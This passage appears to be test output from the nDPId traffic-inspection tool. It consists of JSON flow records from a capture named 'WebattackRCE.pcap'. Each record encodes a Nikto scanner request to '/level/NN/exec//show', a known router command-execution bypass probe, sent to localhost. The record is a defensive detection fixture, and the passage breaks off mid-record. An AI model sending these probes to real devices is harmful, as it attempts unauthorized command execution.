-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":627,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277703,"flow_last_seen":1576420277703,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50816,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":627,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_packet_id":1,"flow_last_seen":1576420277703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277703,"pkt":"AAAAAAAAAAAAAAAACABFAADIZuhAAEAG1UV\/AAABfwAAAcaAH5DHm1\/1JwgzKoAYAED+vAAAAQEICp1m\/u+dZv7vR0VUIC9sZXZlbC83OS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":627,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277703,"flow_last_seen":1576420277703,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50816,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/79\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001326)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":628,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277705,"flow_last_seen":1576420277705,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50818,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":628,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_packet_id":1,"flow_last_seen":1576420277705,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277705,"pkt":"AAAAAAAAAAAAAAAACABFAADIi\/NAAEAGsDp\/AAABfwAAAcaCH5DTprLkQgBQzIAYAED+vAAAAQEICp1m\/vGdZv7xR0VUIC9sZXZlbC84MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":628,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277705,"flow_last_seen":1576420277705,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50818,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/80\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001327)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":629,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277708,"flow_last_seen":1576420277708,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50820,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":629,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_packet_id":1,"flow_last_seen":1576420277708,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277708,"pkt":"AAAAAAAAAAAAAAAACABFAADI5e9AAEAGVj5\/AAABfwAAAcaEH5Dy8dz\/j320kYAYAED+vAAAAQEICp1m\/vOdZv7zR0VUIC9sZXZlbC84MS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":629,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277708,"flow_last_seen":1576420277708,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50820,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/81\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001328)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":630,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277709,"flow_last_seen":1576420277709,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277709,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50822,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":630,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_packet_id":1,"flow_last_seen":1576420277709,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277709,"pkt":"AAAAAAAAAAAAAAAACABFAADIleJAAEAGpkt\/AAABfwAAAcaGH5A96Kz0htu5TYAYAED+vAAAAQEICp1m\/vWdZv71R0VUIC9sZXZlbC84Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzI5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":630,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277709,"flow_last_seen":1576420277709,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277709,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50822,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/82\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001329)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":631,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277711,"flow_last_seen":1576420277711,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50824,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":631,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_packet_id":1,"flow_last_seen":1576420277711,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277711,"pkt":"AAAAAAAAAAAAAAAACABFAADIwilAAEAGegR\/AAABfwAAAcaIH5AoWfs0DfPUMYAYAED+vAAAAQEICp1m\/vedZv73R0VUIC9sZXZlbC84My9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":631,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277711,"flow_last_seen":1576420277711,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50824,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/83\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001330)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":632,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277713,"flow_last_seen":1576420277713,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50826,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_packet_id":1,"flow_last_seen":1576420277713,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277713,"pkt":"AAAAAAAAAAAAAAAACABFAADIsuZAAEAGiUd\/AAABfwAAAcaKH5B+eYvxDWxq9oAYAED+vAAAAQEICp1m\/vmdZv75R0VUIC9sZXZlbC84NC9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzMxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":632,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277713,"flow_last_seen":1576420277713,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50826,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/84\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001331)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":633,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277715,"flow_last_seen":1576420277715,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277715,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50828,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":633,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_packet_id":1,"flow_last_seen":1576420277715,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277715,"pkt":"AAAAAAAAAAAAAAAACABFAADIFWJAAEAGJsx\/AAABfwAAAcaMH5B2cix1DMITXYAYAED+vAAAAQEICp1m\/vudZv77R0VUIC9sZXZlbC84NS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":633,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277715,"flow_last_seen":1576420277715,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277715,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50828,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/85\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001332)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":634,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277716,"flow_last_seen":1576420277716,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277716,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50830,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_packet_id":1,"flow_last_seen":1576420277716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277716,"pkt":"AAAAAAAAAAAAAAAACABFAADIj0FAAEAGrOx\/AAABfwAAAcaOH5BnL7Yrjj53uYAYAED+vAAAAQEICp1m\/vydZv78R0VUIC9sZXZlbC84Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":634,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277716,"flow_last_seen":1576420277716,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277716,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50830,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/86\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001333)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":635,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277718,"flow_last_seen":1576420277718,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50832,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":635,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_packet_id":1,"flow_last_seen":1576420277718,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277718,"pkt":"AAAAAAAAAAAAAAAACABFAADI9rtAAEAGRXJ\/AAABfwAAAcaQH5Cd5s+tew18QIAYAED+vAAAAQEICp1m\/v6dZv7+R0VUIC9sZXZlbC84Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzM0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":635,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277718,"flow_last_seen":1576420277718,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50832,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/87\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001334)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":636,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277719,"flow_last_seen":1576420277719,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50834,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":636,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_packet_id":1,"flow_last_seen":1576420277719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277719,"pkt":"AAAAAAAAAAAAAAAACABFAADIwR1AAEAGexB\/AAABfwAAAcaSH5DFAfgO5Rn4M4AYAED+vAAAAQEICp1m\/v+dZv7\/R0VUIC9sZXZlbC84OC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzUpDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":636,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277719,"flow_last_seen":1576420277719,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50834,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/88\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001335)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":637,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277721,"flow_last_seen":1576420277721,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50836,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":637,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_packet_id":1,"flow_last_seen":1576420277721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277721,"pkt":"AAAAAAAAAAAAAAAACABFAADIEWBAAEAGKs5\/AAABfwAAAcaUH5BnvihJZne+zoAYAED+vAAAAQEICp1m\/wGdZv8BR0VUIC9sZXZlbC84OS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzM2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":637,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277721,"flow_last_seen":1576420277721,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50836,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 